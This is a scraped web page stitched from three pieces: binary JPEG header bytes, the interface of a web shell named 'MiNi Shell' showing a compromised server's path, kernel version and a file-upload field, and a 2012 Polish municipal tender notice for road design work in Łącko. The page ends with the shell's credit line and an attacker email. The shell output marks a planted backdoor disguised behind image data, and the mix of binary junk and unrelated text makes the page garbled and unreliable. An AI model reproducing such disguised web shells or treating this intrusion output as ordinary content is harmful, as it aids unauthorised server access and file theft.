JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120507/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120507/142612-N-2012.html

<p class="kh_header"><b>Łącko: Opracowanie dokumentacji projektowo - kosztorysowej i uzyskanie decyzji o zezwolenie  na realizację  inwestycji drogowej ( zgodnie  z Ustawą  z dnia 10.04.2003r.   o szczególnych zasadach przygotowania i realizacji inwestycji   w zakresie  dróg publicznych Dz. U. z 2008r. Nr 193 poz. 1194 - t.j.) pod nazwą Rozbudowa  istniejącej drogi gminnej  nr 291925K Kluczniki w m. Zabrzeż</b><br>
<b>Numer ogłoszenia: 142612 - 2012; data zamieszczenia: 07.05.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Łącko , Łącko 445, 33-390 Łącko, woj. małopolskie, tel. 18 41 40 710, faks 18 41 40 740.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.lacko.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie dokumentacji projektowo - kosztorysowej i uzyskanie decyzji o zezwolenie  na realizację  inwestycji drogowej ( zgodnie  z Ustawą  z dnia 10.04.2003r.   o szczególnych zasadach przygotowania i realizacji inwestycji   w zakresie  dróg publicznych Dz. U. z 2008r. Nr 193 poz. 1194 - t.j.) pod nazwą Rozbudowa  istniejącej drogi gminnej  nr 291925K Kluczniki w m. Zabrzeż.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot   zamówienia  obejmuje  min.  wykonanie: 

1.1. opracowanie materiałów geodezyjno - prawnych  służące  do regulacji stanu prawnego nieruchomości objętych  inwestycją w zakres którego wchodzą:
1.1.1  geodezyjne ustalenie zakresu zajętości poszczególnych działek ewidencyjnych pod ww. inwestycję poprzez:
a) sporządzenie i zatwierdzenie  operatu podziałowego działek ewidencyjnych w przypadkach gdy:
- jedynie części tych działek zostaną zajęte pod inwestycję, 
- zaistnieje konieczność nabycia poszczególnych  części działek w odrębnych trybach (administracyjnym lub cywilnoprawnym),
b)  dokonanie pomiaru na gruncie i sporządzenie pisemnej opinii potwierdzającej,  że poszczególne działki ewidencyjne    w całości zostaną zajęte pod inwestycję oraz uwidocznienie tego na mapie ewidencji gruntów, w przypadku, gdy te działki ewidencyjne    w całości  zostaną zajęte pod inwestycję i nie  ma potrzeby podziału działek z przyczyn  o których mowa w ppkt. a,
c) projekt podziału należy przedstawić także na  mapie sytuacyjno - wysokościowej  ze szczególnym uwzględnieniem  elementów  pasa drogowego, 
1.1.2 porównawcze wykazy zmian dla nieruchomości objętych inwestycją  o  nieuregulowanym stanie prawnym,   z klauzulą  dokument służy do dokonywania  wpisu w Księdze  Wieczystej  i potwierdzeniem  zgodności z ewidencją gruntów, 
1.1.3 wypisy z rejestru gruntów, odpisy z ksiąg wieczystych lub Aktów Własności Ziemi (w przypadku braku KW) dla nieruchomości objętych inwestycją ,
1.1.4 po zatwierdzeniu podziału nieruchomości ( ostateczna decyzja ZRID) wyznaczenie   i utrwalenie na gruncie nowych  punktów granicznych znakami  granicznymi betonowymi,
1.1.5 wykonanie podkładów geodezyjnych do  celów projektowych w skali 1:500 
Wykonawca po wstępnym ustaleniu na gruncie zakresu zajętości nieruchomości pod inwestycję oraz  sporządzeniu proponowanego projektu podziału nieruchomości zgodnie z pkt. 1.1, przedstawi ten zakres i projekt podziału Zamawiającemu w celu dokonania ewentualnych korekt uwzględniających uwagi Zamawiającego.
1.2. opracowanie kompletnej dokumentacji projektowo-kosztorysowej:
1.2.1) projektu budowlano wykonawczego rozbudowy  istniejącej drogi gminnej nr 291925K Kluczniki na odcinku od km 0+000 do 0+135 w m. Zabrzeż  
1.2.2) przedmiaru robót 
1.2.3) specyfikacji technicznej wykonania i odbioru robót budowlanych 
1.2.4)  kosztorysu inwestorskiego 
1.3 opracowanie  operatu wodno - prawnego  odprowadzenia wód opadowych wraz z uzyskaniem decyzji pozwolenia  wodno - prawnego,
1.4 uzyskanie decyzji o środowiskowych uwarunkowaniach zgody na realizację inwestycji - w razie potrzeby
1.5. Wykonanie wszelkich niezbędnych opracowań projektowych oraz uzyskanie opinii, uzgodnień i decyzji koniecznych w postępowaniu dla wydania  decyzji ZRID
1.6. W imieniu Zamawiającego  złożenie wniosku do właściwego organu administracyjnego   o wydanie decyzji ZRID i uzyskanie prawomocnej decyzji ZRID,
1.7. Wykonanie jednokrotnej aktualizacji kosztorysu inwestorskiego na pisemne wezwanie zamawiającego w terminie      15 dni  od daty wezwania, 
1.8. Wykonawca zobowiązany  jest do pełnienia nadzoru autorskiego, a koszt nadzoru zawarty jest w oferowanej cenie.
2.W ramach opracowania dokumentacji Jednostka projektująca uzyskuje we własnym zakresie wszelkie niezbędne   materiały przedprojektowe , oraz pokrywa wszystkie związane z tym koszty.

3.Dokumentacja  powinna  być  opracowana  następująco: 
a) Projekty budowlane i wykonawcze  (5 egz.  w formie  papierowej 1 egz. w  formie elektronicznej )
 b) specyfikacje Techniczne Wykonania i Odbioru Robót Budowlanych  ( 2 egz. w  formie papierowej , 1 egz. w formie  elektronicznej),  
c)   przedmiar robót  ( 2 egz. w  formie papierowej , 1 egz. w formie  elektronicznej),  
d)   kosztorys inwestorski  ( 2 egz. w  formie papierowej ,1 egz. w formie  elektronicznej). 
e)  opracowanie  operatu wodno - prawnego  odprowadzenia wód opadowych - 2 egz. wraz z uzyskaniem decyzji pozwolenia  wodno - prawnego, 
f) prawomocna decyzja ZRID - 1 egz.

Dokumentacja ma być zrealizowana zgodnie z obowiązującymi przepisami a w szczególności: 
- Ustawa z dnia  25 stycznia 2007 r.  o drogach publicznych ( Dz. U. Nr 19, poz. 115 ze zmianami),
- Ustawa  z dnia 10 kwietnia 2003r o szczególnych zasadach przygotowania i realizacji  inwestycji w zakresie  dróg publicznych ( tj.   z dnia 22.10.2008r. Dz. U. Nr 193 poz. 1194 ze zmianami),
- Rozporządzeniem Ministra Infrastruktury z dnia 3 lipca 2003 r. w sprawie szczegółowego zakresu i formy projektu budowlanego (Dz. U. Nr 120, poz. 1133 ze zmianami),
 - Rozporządzenie Ministra Infrastruktury z dnia 18 maja 2004 r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym (Dz. U. Nr 130 poz. 1389 ze zmianami),
 - Rozporządzenie Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego, (Dz. U. Nr 202 poz. 2072 ze zmianami),
 - Rozporządzenie Ministra Transportu i Gospodarki Morskiej z dnia 2 marca 1999 r. w sprawie warunków technicznych, jakim powinny odpowiadać drogi  publiczne i ich usytuowanie ( Dz. U. Nr 43 poz. 430 ze zmianami),
 - Rozporządzenie Ministra Transportu i Gospodarki Morskiej z dnia 30 maja 2000 r. w sprawie warunków technicznych, jakim powinny odpowiadać drogowe obiekty inżynierskie i ich  usytuowanie ( Dz. U. Nr 63 poz. 735),
 - Prawo Wodne - Ustawa z dnia 18 lipca 2001 roku (tekst jednolity Dz. U. z 2012 r. Nr 145 ),
 - Prawo Ochrony Środowiska-Ustawa z dnia 27 kwietnia.2001r (tekst jednolity Dz. U. z 2008r  Nr 25   poz. 150 ze zmianami),
 - Ustawa z dnia 3 października 2008 r. o udostępnieniu informacji o środowisku i jego ochronie, udziale  społeczeństwa w ochronie środowiska oraz o ocenach oddziaływania  na środowisko ( Dz. U z 2008 r. Nr 199, poz. 1227 ze zmianami)
- Ustawy z dnia 21 sierpnia 1997 o gospodarce nieruchomości ( tj. Dz. U. z 2010 Nr 102 poz. 651 ze zmianami)
- Ustawa z dnia 29 stycznia  2004 r- Prawo zamówień publicznych ( Dz. U.  z 2010 r. Nr 113 poz. 759 ze zmianami)
- Inne, nie wymienione  wyżej  akty  prawne i przepisy konieczne  do zrealizowania inwestycji.
4. Zakres projektu  zgodnie  z  załączoną  mapą  na której   zaznaczono lokalizację  drogi -  załącznik nr 9 do  SIWZ..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.32.20.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.05.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający  nie  precyzuje  w tym zakresie  szczególnych  wymagań</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy wykażą że   w okresie ostatnich trzech lat przed upływem terminu składania ofert a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, wykonali  minimum 1 dokumentację projektową ( dla drogi) do uzyskania decyzji ZRID wraz z  uzyskaniem decyzji ZRID. 
Na potwierdzenie  warunku  Wykonawca złoży zał. nr 7  SIWZ Wykaz usług wraz z załączeniem  dokumentu potwierdzającego , że usługi  zostały wykonane lub są wykonywane należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający  nie  precyzuje  w tym zakresie  szczególnych  wymagań</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy wykażą  że dysponują : projektantem posiadającym odpowiednie uprawnienia do projektowania w  specjalności: drogowej
Na potwierdzenie  warunku  Wykonawca złoży zał. nr  5  SIWZ  Wykaz osób  oraz oświadczenie o uprawnieniach  -że wymieniona osoba posiada  odpowiednie uprawnienia  zał. nr  6 SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający  nie  precyzuje  w tym zakresie  szczególnych  wymagań</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Jeżeli w miejscu zamieszkania osoby  lub  w kraju  w którym wykonawca  ma siedzibę  lub miejsce zamieszkania , nie   wydaje się  dokumentów o których mowa w pkt. 4.3.1  zastępuje się je  dokumentem zawierającym  oświadczenie złożone
przed notariuszem , właściwym organem sądowym , administracyjnym  albo organem samorządu  zawodowego lub   gospodarczego  odpowiednio  miejsca zamieszkania  osoby lub kraju , w którym  wykonawca ma siedzibę  lub miejsce
zamieszkania .</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana postanowień  umowy może być dokonana w przypadku zmian nieistotnych w stosunku do treści oferty , na podstawie której dokonano wyboru wykonawcy  lub  okoliczności, których nie można było przewidzieć w chwili zawarcia    umowy a w szczególności : 
-  wydłużenia terminu wykonania zamówienia z uwagi na wystąpienie nadzwyczajnych warunków pogodowych nie pozwalających na wykonanie zamówienia lub wystąpienia innych okoliczności niezależnych od Wykonawcy, pod warunkiem wyrażenia zgody przez Zamawiającego. Termin może ulec przedłużeniu na  czas trwania tych okoliczności;
-   z uwagi  na niezależne od Stron umowy zmiany dotyczące osób kluczowych dla realizacji umowy, np. projektanta, osób reprezentujących Strony ( w szczególności choroba, wypadki losowe, nieprzewidziane zmiany organizacyjne);
-   wystąpienia konieczności zmiany podwykonawcy dla części zamówienia, którą wykonawca wskazał w ofercie, że powierzy ją do wykonania podwykonawcy, za  zgodą  Zamawiającego z zachowaniem zasad dot.  podwykonawców określonych w umowie;
-   w szczególnie  uzasadnionym przypadku wystąpienia konieczności realizacji przez podwykonawcę części zamówienia, której Wykonawca nie wskazał w ofercie, że powierzy ją  do wykonania podwykonawcy, za zgodą Zamawiającego i z zachowaniem zasad dotyczących podwykonawców określonych  we wzorze umowy w SIWZ;
- sytuacji, gdy Wykonawca opierał się na  zasobach podmiotów  trzecich  wykazując spełnienie warunków udziału w postępowaniu, dopuszcza się zmianę tych podmiotów na etapie realizacji zamówienia, pod warunkiem, że  nowy podmiot wykaże spełnienie warunków w zakresie nie  mniejszym niż  wskazany na etapie  postępowania o zamówienie publiczne;
-   zmianie uległy przepisy prawne istotne dla realizacji przedmiotu umowy;
-   zmian teleadresowych Stron umowy określonych w umowie;
-   w przypadku wystąpienia  obiektywnych zmian ocenianych jako korzystne  dla Zamawiającego;
-    zmiany wysokości stawki podatku od towarów i usług.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.lacko.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Łącko
33-390 Łacko 445 pok. 21.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.05.2012 godzina 10:15, miejsce: Urząd Gminy Łącko
33-390 Łącko 445 pok. 10.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com